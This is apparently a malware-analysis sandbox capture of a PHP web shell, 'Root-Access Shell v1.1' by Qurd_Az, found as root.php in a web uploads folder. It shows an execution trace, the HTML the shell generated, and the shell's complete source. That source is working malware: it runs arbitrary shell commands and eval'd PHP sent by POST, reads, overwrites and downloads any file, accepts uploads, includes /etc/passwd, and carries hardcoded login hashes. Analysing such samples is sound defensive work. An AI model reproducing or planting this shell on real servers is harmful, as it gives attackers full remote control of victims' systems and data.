3 58 0 0.010768 481296 function_exists 0 /var/www/html/uploads/root.php 60 1 'mssql_connect'
3 58 1 0.010783 481336
3 58 R FALSE
2 57 1 0.010797 481296
2 57 R '<font size=2 color=#ff4500>OFF</font>'
2 59 0 0.010814 481296 testperl 1 /var/www/html/uploads/root.php 165 0
3 60 0 0.010826 481296 ex 1 /var/www/html/uploads/root.php 43 1 'perl -h'
3 A /var/www/html/uploads/root.php 68 $out = ''
4 61 0 0.010848 481296 function_exists 0 /var/www/html/uploads/root.php 69 1 'exec'
4 61 1 0.010862 481336
4 61 R TRUE
4 62 0 0.010875 481320 exec 0 /var/www/html/uploads/root.php 69 2 'perl -h' ''
4 62 1 0.013048 487040
4 62 R ''
4 63 0 0.013091 486976 join 0 /var/www/html/uploads/root.php 69 2 '\n' [0 => '', 1 => 'Usage: perl [switches] [--] [programfile] [arguments]', 2 => ' -0[octal/hexadecimal] specify record separator (\\0, if no argument)', 3 => ' -a autosplit mode with -n or -p (splits $_ into @F)', 4 => ' -C[number/list] enables the listed Unicode features', 5 => ' -c check syntax only (runs BEGIN and CHECK blocks)', 6 => ' -d[t][:MOD] run program under debugger or module Devel::MOD', 7 => ' -D[number/letters] set debugging flags (argument is a bit mask or alphabets)', 8 => ' -e commandline one line of program (several -e\'s allowed, omit programfile)', 9 => ' -E commandline like -e, but enables all optional features', 10 => ' -f don\'t do $sitelib/sitecustomize.pl at startup', 11 => ' -F/pattern/ split() pattern for -a switch (//\'s are optional)', 12 => ' -i[extension] edit <> files in place (makes backup if extension supplied)', 13 => ' -Idirectory specify @INC/#include directory (several -I\'s allowed)', 14 => ' -l[octnum] enable line ending processing, specifies line terminator', 15 => ' -[mM][-]module execute "use/no module..." before executing program', 16 => ' -n assume "while (<>) { ... }" loop around program', 17 => ' -p assume loop like -n but print line also, like sed', 18 => ' -s enable rudimentary parsing for switches after programfile', 19 => ' -S look for programfile using PATH environment variable', 20 => ' -t enable tainting warnings', 21 => ' -T enable tainting checks', 22 => ' -u dump core after parsing program', 23 => ' -U allow unsafe operations', 24 => ' -v print version, patchlevel and license', 25 => ' -V[:configvar] print configuration summary (or a single Config.pm variable)', 26 => ' -w enable many useful warnings', 27 => ' -W enable all warnings', 28 => ' -x[directory] ignore text before #!perl line (optionally cd to directory)', 29 => ' -X disable all warnings', 30 => '', 31 => 'Run \'perldoc perl\' for more help with Perl.', 32 => '']
4 63 1 0.013203 489088
4 63 R '\nUsage: perl [switches] [--] [programfile] [arguments]\n -0[octal/hexadecimal] specify record separator (\\0, if no argument)\n -a autosplit mode with -n or -p (splits $_ into @F)\n -C[number/list] enables the listed Unicode features\n -c check syntax only (runs BEGIN and CHECK blocks)\n -d[t][:MOD] run program under debugger or module Devel::MOD\n -D[number/letters] set debugging flags (argument is a bit mask or alphabets)\n -e commandline '
3 A /var/www/html/uploads/root.php 69 $out = '\nUsage: perl [switches] [--] [programfile] [arguments]\n -0[octal/hexadecimal] specify record separator (\\0, if no argument)\n -a autosplit mode with -n or -p (splits $_ into @F)\n -C[number/list] enables the listed Unicode features\n -c check syntax only (runs BEGIN and CHECK blocks)\n -d[t][:MOD] run program under debugger or module Devel::MOD\n -D[number/letters] set debugging flags (argument is a bit mask or alphabets)\n -e commandline '
3 60 1 0.013291 483344
3 60 R '\nUsage: perl [switches] [--] [programfile] [arguments]\n -0[octal/hexadecimal] specify record separator (\\0, if no argument)\n -a autosplit mode with -n or -p (splits $_ into @F)\n -C[number/list] enables the listed Unicode features\n -c check syntax only (runs BEGIN and CHECK blocks)\n -d[t][:MOD] run program under debugger or module Devel::MOD\n -D[number/letters] set debugging flags (argument is a bit mask or alphabets)\n -e commandline '
2 59 1 0.013335 481296
2 59 R '<font size=2 color=#29a329>ON</font>'
2 64 0 0.013362 481296 date 0 /var/www/html/uploads/root.php 166 1 'H:i d-m-Y'
2 64 1 0.013443 483648
2 64 R '23:27 12-02-2023'
2 65 0 0.013470 483360 shell 1 /var/www/html/uploads/root.php 168 0
3 66 0 0.013506 483360 ex 1 /var/www/html/uploads/root.php 87 1 'ls -la'
3 A /var/www/html/uploads/root.php 68 $out = ''
4 67 0 0.013540 483360 function_exists 0 /var/www/html/uploads/root.php 69 1 'exec'
4 67 1 0.013559 483400
4 67 R TRUE
4 68 0 0.013578 483384 exec 0 /var/www/html/uploads/root.php 69 2 'ls -la' ''
4 68 1 0.015302 484488
4 68 R '-rw-rw-r-- 1 osboxes osboxes 11792 Feb 12 23:27 root.php'
4 69 0 0.015333 484328 join 0 /var/www/html/uploads/root.php 69 2 '\n' [0 => 'total 32', 1 => 'drwxrwxrwx 3 root root 4096 Feb 12 23:27 .', 2 => 'drwxrwxrwx 3 root root 4096 Feb 12 23:27 ..', 3 => '-rw-r--r-- 1 root root 64 Feb 12 23:27 .htaccess', 4 => 'drwxrwxrwx 2 root root 4096 Feb 12 23:27 data', 5 => '-rwxr-xr-x 1 root root 57 Feb 12 23:27 prepend.php', 6 => '-rw-rw-r-- 1 osboxes osboxes 11792 Feb 12 23:27 root.php']
4 69 1 0.015362 484776
4 69 R 'total 32\ndrwxrwxrwx 3 root root 4096 Feb 12 23:27 .\ndrwxrwxrwx 3 root root 4096 Feb 12 23:27 ..\n-rw-r--r-- 1 root root 64 Feb 12 23:27 .htaccess\ndrwxrwxrwx 2 root root 4096 Feb 12 23:27 data\n-rwxr-xr-x 1 root root 57 Feb 12 23:27 prepend.php\n-rw-rw-r-- 1 osboxes osboxes 11792 Feb 12 23:27 root.php'
3 A /var/www/html/uploads/root.php 69 $out = 'total 32\ndrwxrwxrwx 3 root root 4096 Feb 12 23:27 .\ndrwxrwxrwx 3 root root 4096 Feb 12 23:27 ..\n-rw-r--r-- 1 root root 64 Feb 12 23:27 .htaccess\ndrwxrwxrwx 2 root root 4096 Feb 12 23:27 data\n-rwxr-xr-x 1 root root 57 Feb 12 23:27 prepend.php\n-rw-rw-r-- 1 osboxes osboxes 11792 Feb 12 23:27 root.php'
3 66 1 0.015408 483744
3 66 R 'total 32\ndrwxrwxrwx 3 root root 4096 Feb 12 23:27 .\ndrwxrwxrwx 3 root root 4096 Feb 12 23:27 ..\n-rw-r--r-- 1 root root 64 Feb 12 23:27 .htaccess\ndrwxrwxrwx 2 root root 4096 Feb 12 23:27 data\n-rwxr-xr-x 1 root root 57 Feb 12 23:27 prepend.php\n-rw-rw-r-- 1 osboxes osboxes 11792 Feb 12 23:27 root.php'
2 A /var/www/html/uploads/root.php 87 $u = 'total 32\ndrwxrwxrwx 3 root root 4096 Feb 12 23:27 .\ndrwxrwxrwx 3 root root 4096 Feb 12 23:27 ..\n-rw-r--r-- 1 root root 64 Feb 12 23:27 .htaccess\ndrwxrwxrwx 2 root root 4096 Feb 12 23:27 data\n-rwxr-xr-x 1 root root 57 Feb 12 23:27 prepend.php\n-rw-rw-r-- 1 osboxes osboxes 11792 Feb 12 23:27 root.php'
2 65 1 0.015450 483744
2 65 R 'total 32\ndrwxrwxrwx 3 root root 4096 Feb 12 23:27 .\ndrwxrwxrwx 3 root root 4096 Feb 12 23:27 ..\n-rw-r--r-- 1 root root 64 Feb 12 23:27 .htaccess\ndrwxrwxrwx 2 root root 4096 Feb 12 23:27 data\n-rwxr-xr-x 1 root root 57 Feb 12 23:27 prepend.php\n-rw-rw-r-- 1 osboxes osboxes 11792 Feb 12 23:27 root.php'
2 70 0 0.015473 483744 htmlspecialchars 0 /var/www/html/uploads/root.php 168 1 'total 32\ndrwxrwxrwx 3 root root 4096 Feb 12 23:27 .\ndrwxrwxrwx 3 root root 4096 Feb 12 23:27 ..\n-rw-r--r-- 1 root root 64 Feb 12 23:27 .htaccess\ndrwxrwxrwx 2 root root 4096 Feb 12 23:27 data\n-rwxr-xr-x 1 root root 57 Feb 12 23:27 prepend.php\n-rw-rw-r-- 1 osboxes osboxes 11792 Feb 12 23:27 root.php'
2 70 1 0.015499 484544
2 70 R 'total 32\ndrwxrwxrwx 3 root root 4096 Feb 12 23:27 .\ndrwxrwxrwx 3 root root 4096 Feb 12 23:27 ..\n-rw-r--r-- 1 root root 64 Feb 12 23:27 .htaccess\ndrwxrwxrwx 2 root root 4096 Feb 12 23:27 data\n-rwxr-xr-x 1 root root 57 Feb 12 23:27 prepend.php\n-rw-rw-r-- 1 osboxes osboxes 11792 Feb 12 23:27 root.php'
2 71 0 0.015523 483360 edit 1 /var/www/html/uploads/root.php 168 0
2 71 1 0.015537 483360
2 71 R NULL
2 72 0 0.015552 483360 pwd 1 /var/www/html/uploads/root.php 170 0
3 73 0 0.015565 483360 chdir 0 /var/www/html/uploads/root.php 101 1 NULL
3 73 1 0.015586 483400
3 73 R FALSE
3 74 0 0.015600 483360 getcwd 0 /var/www/html/uploads/root.php 102 0
3 74 1 0.015612 483408
3 74 R '/var/www/html/uploads'
2 A /var/www/html/uploads/root.php 102 $cwd = '/var/www/html/uploads'
3 75 0 0.015637 483408 strrpos 0 /var/www/html/uploads/root.php 103 2 '/var/www/html/uploads' '/'
3 75 1 0.015651 483480
3 75 R 13
2 A /var/www/html/uploads/root.php 103 $u = 13
2 72 1 0.015674 483408
2 72 R '/var/www/html/uploads/'
2 76 0 0.015698 483472 pwd 1 /var/www/html/uploads/root.php 174 0
3 77 0 0.015710 483472 chdir 0 /var/www/html/uploads/root.php 101 1 NULL
3 77 1 0.015727 483512
3 77 R FALSE
3 78 0 0.015740 483472 getcwd 0 /var/www/html/uploads/root.php 102 0
3 78 1 0.015752 483520
3 78 R '/var/www/html/uploads'
2 A /var/www/html/uploads/root.php 102 $cwd = '/var/www/html/uploads'
3 79 0 0.015775 483520 strrpos 0 /var/www/html/uploads/root.php 103 2 '/var/www/html/uploads' '/'
3 79 1 0.015788 483592
3 79 R 13
2 A /var/www/html/uploads/root.php 103 $u = 13
2 76 1 0.015810 483520
2 76 R '/var/www/html/uploads/'
2 80 0 0.015825 483472 pwd 1 /var/www/html/uploads/root.php 175 0
3 81 0 0.015837 483472 chdir 0 /var/www/html/uploads/root.php 101 1 NULL
3 81 1 0.015853 483512
3 81 R FALSE
3 82 0 0.015866 483472 getcwd 0 /var/www/html/uploads/root.php 102 0
3 82 1 0.015878 483520
3 82 R '/var/www/html/uploads'
2 A /var/www/html/uploads/root.php 102 $cwd = '/var/www/html/uploads'
3 83 0 0.015901 483520 strrpos 0 /var/www/html/uploads/root.php 103 2 '/var/www/html/uploads' '/'
3 83 1 0.015913 483592
3 83 R 13
2 A /var/www/html/uploads/root.php 103 $u = 13
2 80 1 0.015935 483520
2 80 R '/var/www/html/uploads/'
1 3 1 0.015950 483472
0.015996 379208
TRACE END [2023-02-13 02:27:49.093597]
Generated HTML code
<html><head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Qurd_Az_SH3LL</title>
</head>
<body bgcolor="#242629">
<p align="center"><b><font size="6" color="#008000">
<a href="mailto:--------------------------------%3C%20Qurd_Az_SH3ll%20%3C%3C%3C----%3E%3E%3E%20Email:Qurd_Az@Box.AZ%3E%20%3E--------------------------------">
<span style="text-decoration: none">Email : Qurd_Az@Box.Az</span></a></font></b></p>
<p align="center"><b><font size="6" color="#008000">..:: 0wn3R By Qurd_Az ::..</font></b></p>
<title>Root-Access Shell</title><meta http-equiv="Content-Type" content="text/html; charset=CP866">
<style type="text/css">
BODY { font-family: Verdana, Tahoma, Arial, sans-serif;font-size: 8px;margin: 0px;padding: 0px;text-align: center;color: #e7e7eb;background-color: #242629;}
TABLE, TR, TD { font-family: Verdana, Tahoma, Arial, sans-serif;font-size: 10px;color: #e7e7eb;}
.contentb {background-color: #44474f;}
.t {padding: 6px;background-color: #242629;}
input,textarea,select
{background: #44474f;
border: 1px solid #242629;
color: #e7e7eb;
font-family: verdana, helvetica, sans-serif;
font-size: 11px;
margin: 5px;
padding: 2px;
vertical-align: middle;}
</style>
<script>
function kill(){
var y;
y = confirm('Do you indeed want to delete web-shell?');
if(y == true){document.location = '?kill=done';}}</script><br><center><table width="95%" border="0" cellspacing="1" cellpadding="1" bgcolor="#646c71" style="border-color:" #000000;="">
<tbody><tr><th class="t" align="left"><font size="2"><b>Server Info</b></font></th></tr><tr><td class="contentb"><table border="0" width="100%"><tbody><tr><td width="35%">System: <font size="1" color="#ff4500">Linux 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023</font></td>
<td width="15%">PHP-version: <font size="1" color="#29a329">7.2.34-37+ubuntu22.04.1+deb.sury.org+1</font></td>
<td width="15%">Oracle: <font size="2" color="#ff4500">OFF</font></td><td width="25%">Safe_mode: <font size="2" color="#ff4500">OFF</font></td></tr><tr>
<td width="35%">Server: <font size="1" color="#ff4500">Apache/2.4.52 (Ubuntu)</font></td>
<td width="15%">MySQL: <font size="2" color="#ff4500">OFF</font></td><td width="15%">cURL: <font size="2" color="#29a329">ON</font></td><td width="25%">Total space: 216.08 GB</td></tr><tr>
<td width="35%">PWD: <font size="1" color="#ff4500">/var/www/html/</font></td>
<td width="15%">PostgreSQL: <font size="2" color="#ff4500">OFF</font></td><td width="15%">WGet: <font size="2" color="#29a329">ON</font></td><td width="25%">Free space: 180.09 GB</td></tr><tr>
<td width="35%">User: <font size="1" color="#ff4500">uid=33(www-data) gid=33(www-data) groups=33(www-data)</font></td>
<td width="15%">MSSQL: <font size="2" color="#ff4500">OFF</font></td><td width="15%">Perl: <font size="2" color="#29a329">ON</font></td>
<td width="25%">Server time: 23:27 12-02-2023</td></tr></tbody></table></td></tr></tbody></table><table width="95%" border="0" cellspacing="1" cellpadding="1" bgcolor="#646c71" style="border-color:" #000000;="">
<tbody><tr><th class="t" align="left"><font size="2"><b>Shell</b> <a onclick="kill()"><b><font color="#FF0000">[Kill Shell]</font></b></a></font></th></tr>
<tr><td class="contentb"><center><form action="" method="POST"><input type="hidden" name="type" value="5"><textarea cols="150" rows="20" name="value">total 20
drwxrwxrwx 2 root root 4096 Feb 12 23:27 .
drwxrwxrwx 3 root root 4096 Feb 12 23:27 ..
-rw-r--r-- 1 root root 0 Feb 12 23:27 beneri.se_malware_analysis
-rw-rw-r-- 1 osboxes osboxes 11792 Feb 12 23:27 root.php</textarea></form><table border="0" width="100%"><tbody><tr><td width="50%" align="center"><form action="" method="POST">
<b>Enter comand:</b><input type="hidden" name="type" value="2"><input type="text" name="value" size="45"><input type="submit" value="Enter">
</form></td><td width="50%" align="center"><form action="" method="POST"><b>PWD:</b> <input type="text" name="value" size="51" value="/var/www/html/"><input type="hidden" name="type" value="3"><input type="submit" value="Enter">
</form></td></tr></tbody></table></center></td></tr></tbody></table><table width="95%" border="0" cellspacing="1" cellpadding="1" bgcolor="#646c71" style="border-color:" #000000;="">
<tbody><tr><th class="t" align="left"><font size="2"><b>Tools</b></font></th></tr>
<tr><td class="contentb"><table border="0" width="100%"><tbody><tr><td width="50%"><form action="" method="POST"><b>Edit file:</b><input type="hidden" name="type" value="4">
<input type="text" name="value" size="52" value="/var/www/html/"><input type="submit" value="Edit"></form></td>
<td width="50%"><form action="" method="POST"><b>Download:</b><input type="hidden" name="type" value="11"><input type="text" name="value" size="51" value="/var/www/html/"><input type="submit" value="Download">
</form></td></tr><tr><td width="50%"><form action="" method="POST"><b>Run PHP Code:</b>
<input type="hidden" name="type" value="1"><textarea rows="5" cols="46" name="value">echo "Root-Access Shell";</textarea><input type="submit" value="Run code"></form></td>
<td width="50%"><form enctype="multipart/form-data" action="" method="POST"><b>Upload:</b><input type="hidden" name="type" value="6">
<input type="file" name="userfile" size="40"><br><input type="hidden" name="type" value="6"><b>New name:</b><input type="text" size="37" name="newname"><input type="submit" value="Upload">
</form></td> </tr></tbody></table></td></tr></tbody></table><table width="95%" border="0" cellspacing="1" cellpadding="1" bgcolor="#646c71" style="border-color:" #000000;="">
<tbody><tr><th class="t" align="left"><font size="2"><b>Copyright</b></font></th></tr>
<tr><td class="contentb"><center><a href="http://forum.root-access.ru"><font size="2" color="#e7e7eb">Root-Access Shell v1.1</font></a></center>
</td></tr></tbody></table><br></center>
<p align="center"><b><font size="4" color="#800000"></font></b></p></body></html>Original PHP code
<html>
<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Qurd_Az_SH3LL</title>
</head>
<body>
<p align="center"><b><font size="6" color="#008000">
<a href="mailto:--------------------------------%3C%20Qurd_Az_SH3ll%20%3C%3C%3C----%3E%3E%3E%20Email:Qurd_Az@Box.AZ%3E%20%3E--------------------------------">
<span style="text-decoration: none">Email : Qurd_Az@Box.Az</span></a></font></b></p>
<p align="center"><b><font size="6" color="#008000">..:: 0wn3R By Qurd_Az ::..</font></b></p>
</body>
</html>
<?php
$auth = 0; //Auth on/off == 1/0
ini_set("session.gc_maxlifetime",1);
session_start();
error_reporting(0);
safe_mode();
$name="63a9f0ea7bb98050796b649e85481845";//login = "root"
$pass="9df3b01c60df20d13843841ff0d4482c";//pass = "access"
if($auth == 1){if (!isset($HTTP_SERVER_VARS['PHP_AUTH_USER']) || md5($HTTP_SERVER_VARS['PHP_AUTH_USER'])!=$name || md5($HTTP_SERVER_VARS['PHP_AUTH_PW'])!=$pass)
{header("WWW-Authenticate: Basic realm=\"PanelAccess\"");
header("HTTP/1.0 401 Unauthorized");exit("Access Denied");}}
if($_POST['type']==11){download(stripslashes($_POST['value']));};
function download($dfilename)
{$file=fopen($dfilename,"r");
ob_clean();
$filename = basename($dfilename);
$filedump = fread($file,@filesize($dfilename));
fclose($file);
header("Content-type: ".$mime_type);
header("Content-disposition: attachment; filename=\"".$filename."\";");
echo $filedump;}
function testperl()
{if(ex('perl -h'))
{return "<font size=2 color=#29a329>ON</font>";}else{return "<font size=2 color=#ff4500>OFF</font>";}
}function view_size($size){
if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
else {$size = $size . " B";}
return $size;}
function testfetch()
{if(ex('fetch --help'))
{return "<font size=2 color=#29a329>ON</font>";}else{return "<font size=2 color=#ff4500>OFF</font>";}
}function testwget(){
if(ex('wget --help')){return "<font size=2 color=#29a329>ON</font>";}else{return "<font size=2 color=#ff4500>OFF</font>";}
}function oracle(){
if(function_exists('ocilogon')){return "<font size=2 color=#29a329>ON</font>";}else{return "<font size=2 color=#ff4500>OFF</font>";}
}function postgresql(){
if(function_exists('pg_connect')){return "<font size=2 color=#29a329>ON</font>";}else{return "<font size=2 color=#ff4500>OFF</font>";}
}function testmssql(){if(function_exists('mssql_connect')){return "<font size=2 color=#29a329>ON</font>";}else{return "<font size=2 color=#ff4500>OFF</font>";}
}function testcurl(){
if(function_exists('curl_version')){return "<font size=2 color=#29a329>ON</font>";}else{return "<font size=2 color=#ff4500>OFF</font>";}
}function testmysql(){
if(function_exists('mysql_connect')){return "<font size=2 color=#29a329>ON</font>";}else{return "<font size=2 color=#ff4500>OFF</font>";}
}function safe_mode(){
if(!$safe_mode && strpos(ex("echo abch0ld"),"h0ld")!=3){$_SESSION['safe_mode'] = 1;return "<font size=2 color=#29a329>ON</font>";}else{ $_SESSION['safe_mode'] = 0;return "<font size=2 color=#ff4500>OFF</font>";}
};function ex($in){
$out = '';
if(function_exists('exec')){exec($in,$out);$out = join("\n",$out);}elseif(function_exists('passthru')){ob_start();passthru($in);$out = ob_get_contents();ob_end_clean();}
elseif(function_exists('system')){ob_start();system($in);$out = ob_get_contents();ob_end_clean();}
elseif(function_exists('shell_exec')){$out = shell_exec($in);}
elseif(is_resource($f = popen($in,"r"))){$out = "";while(!@feof($f)) { $out .= fread($f,1024);}
pclose($f);}
return $out;}
function shell()
{if($_POST['type']==1){eval(stripslashes($_POST['value']));}elseif($_POST['type']==2){pwd();print_r(ex(stripslashes($_POST['value'])));}
elseif($_POST['type']==3){if($_SESSION['safe_mode'] == 1){if(($u=safe_ex('ls -la'))!='')
{return $u;}else{return safe_ex('dir');};}else{if(($u=ex('ls -la'))!=''){return $u;}else{return ex('dir');};}}
elseif($_POST['type']==4){
if(file_exists(stripslashes($_POST['value']))){
if($safe_mode!=1){echo htmlspecialchars(fread(fopen(stripslashes($_POST['value']),"rw"),filesize(stripslashes($_POST['value']))));
}else{echo htmlspecialchars(safe_read(stripslashes($_POST['value'])));};
$_SESSION['edit']=1;
$_SESSION['filename'] = $_POST['value'];}else{return 'File doesn\'t exists!';}}
elseif($_POST['type']==5){fputs(fopen($_SESSION['filename'],"w"),stripslashes($_POST['value']));}
elseif($_POST['type']==6){$uploaddir = pwd();if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];};move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name);}
else{$u = ex('ls -la');if($u == ''){return ex('dir');}else{return $u;};}
return null;};
function edit()
{if ($_SESSION['edit'] == 1){$_SESSION['edit']=0;return "<br><center><input type=submit value=\"Save\"></center>";};}
function getsystem()
{return php_uname('s')." ".php_uname('r')." ".php_uname('v');};
function getserver()
{return getenv("SERVER_SOFTWARE");};
function getuser()
{$out = get_current_user();
if($out!="SYSTEM"){if(($out=ex('id'))==''){$out = "uid=".getmyuid()."(".get_current_user().") gid=".getmygid();};}
return $out;};
function pwd()
{if($_POST['type']==3){$_SESSION['pwd'] = stripslashes($_POST['value']);}
chdir($_SESSION['pwd']);
$cwd = getcwd();
if($u=strrpos($cwd,'/'))
{if($u!=strlen($cwd)-1){return $cwd.'/';}else{return $cwd;};}
elseif($u=strrpos($cwd,'\\'))
{if($u!=strlen($cwd)-1){return $cwd.'\\';}else{return $cwd;};};
}function safe_ex($in){
if($in){$d=dir('.');
while (false!==($file=$d->read())){
if ($file=="." || $file=="..") continue;
@clearstatcache();
list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
if(!$unix){
echo date("d.m.Y H:i",$mtime)." ";
if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size);
}else{$owner = @posix_getpwuid($uid);
$grgid = @posix_getgrgid($gid);
echo $inode." ";
echo perms(@fileperms($file));
printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
echo date("d.m.Y H:i ",$mtime);}
echo "$file\n";}
$d->close();}
function safe_read($in)
{echo ini_get("safe_mode");
echo ini_get("open_basedir");
include("/etc/passwd");
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
file_get_contents($in);}
}if($_GET['kill']=='done'){
unlink($_SERVER['SCRIPT_FILENAME']);
echo "<script>alert('Your shell script was succefully deleted!')</script>";}?>
<html><head><title>Root-Access Shell</title><META http-equiv="Content-Type" content="text/html; charset=CP866">
<style type=text/css>
BODY { font-family: Verdana, Tahoma, Arial, sans-serif;font-size: 8px;margin: 0px;padding: 0px;text-align: center;color: #e7e7eb;background-color: #242629;}
TABLE, TR, TD { font-family: Verdana, Tahoma, Arial, sans-serif;font-size: 10px;color: #e7e7eb;}
.contentb {background-color: #44474f;}
.t {padding: 6px;background-color: #242629;}
input,textarea,select
{background: #44474f;
border: 1px solid #242629;
color: #e7e7eb;
font-family: verdana, helvetica, sans-serif;
font-size: 11px;
margin: 5px;
padding: 2px;
vertical-align: middle;}
</style>
<script>
function kill(){
var y;
y = confirm('Do you indeed want to delete web-shell?');
if(y == true){document.location = '?kill=done';}}</script></head><body bgcolor='#242629'><br><center><table width=95% border=0 cellspacing=1 cellpadding=1 bgcolor=#646c71 style=border-color: #000000;>
<tr><th class=t align=left><font size=2><b>Server Info</b></font></th></tr><tr><td class=contentb><table border="0" width="100%"><tr><td width="35%" >System: <font size=1 color=#ff4500><?php echo getsystem();?></font></td>
<td width="15%" >PHP-version: <font size=1 color=#29a329><?php echo phpversion();?></font></td>
<td width="15%" >Oracle: <?php echo oracle();?></td><td width="25%" >Safe_mode: <?php echo safe_mode();?></td></tr><tr>
<td width="35%" >Server: <font size=1 color=#ff4500><?php echo getserver();?></font></td>
<td width="15%" >MySQL: <?php echo testmysql();?></td><td width="15%" >cURL: <?php echo testcurl();?></td><td width="25%" >Total space: <?php echo view_size(disk_total_space(getcwd()));?></td></tr><tr>
<td width="35%" >PWD: <font size=1 color=#ff4500><?php if(strlen($u=pwd())>45){echo "...".substr($u,strlen($u)-40,40);}else{echo $u;};?></font></td>
<td width="15%" >PostgreSQL: <?php echo postgresql();?></td><td width="15%" >WGet: <?php echo testwget();?></td><td width="25%" >Free space: <?php echo view_size(diskfreespace(getcwd()));?></td></tr><tr>
<td width="35%" >User: <font size=1 color=#ff4500><?php echo getuser();?></font></td>
<td width="15%" >MSSQL: <?php echo testmssql();?></td><td width="15%" >Perl: <?php echo testperl();?></td>
<td width="25%" >Server time: <?php echo date('H:i d-m-Y');?></td></tr></table></td></tr></table><table width=95% border=0 cellspacing=1 cellpadding=1 bgcolor=#646c71 style=border-color: #000000;>
<tr><th class=t align=left><font size=2><b>Shell</b> <a onclick='kill()'><b><font color="#FF0000">[Kill Shell]</font></b></a></font></th></tr>
<tr><td class=contentb><center><form action method=POST><input type=hidden name="type" value=5><textarea cols=150 rows=20 name="value"><?php echo htmlspecialchars(shell());?></textarea><?php echo edit();?></form><table border="0" width="100%"><tr><td width="50%" align="center"><form action method=POST>
<b>Enter comand:</b><input type=hidden name="type" value=2><input type=text name="value" size=45><input type=submit value="Enter">
</form></td><td width="50%" align="center"><form action method=POST><b>PWD:</b> <input type=text name="value" size=51 value=<?php echo pwd();?>><input type=hidden name="type" value=3><input type=submit value="Enter">
</form></td></tr></table></td></tr></table><table width=95% border=0 cellspacing=1 cellpadding=1 bgcolor=#646c71 style=border-color: #000000;>
<tr><th class=t align=left><font size=2><b>Tools</b></font></th></tr>
<tr><td class=contentb><table border="0" width="100%"><tr><td width="50%"><form action method=POST><b>Edit file:</b><input type=hidden name="type" value=4>
<input type=text name="value" size=52 value=<?php echo pwd();?>><input type=submit value="Edit"></form></td>
<td width="50%"><form action method=POST><b>Download:</b><input type=hidden name="type" value=11><input type=text name="value" size=51 value=<?php echo pwd();?>><input type=submit value="Download">
</form></td></tr><tr><td width="50%"><form action method=POST><b>Run PHP Code:</b>
<input type=hidden name="type" value=1><textarea rows=5 cols=46 name="value"><?php echo 'echo "Root-Access Shell";';?></textarea><input type=submit value="Run code"></form></td>
<td width="50%"><form enctype="multipart/form-data" action method=POST><b>Upload:</b><input type=hidden name="type" value=6>
<input type=file name="userfile" size=40><br><input type=hidden name="type" value=6><b>New name:</b><input type=text size=37 name="newname"><input type=submit value="Upload">
</form></td> </tr></table></td></tr></table><table width=95% border=0 cellspacing=1 cellpadding=1 bgcolor=#646c71 style=border-color: #000000;>
<tr><th class=t align=left><font size=2><b>Copyright</b></font></th></tr>
<tr><td class=contentb><center><a href="http://forum.root-access.ru"><font size=2 color=#e7e7eb>Root-Access Shell v1.1</font></a></center>
</td></tr></table><br></center></body></html>
<p align="center"><b><font size="4" color="#800000"></font></b></p>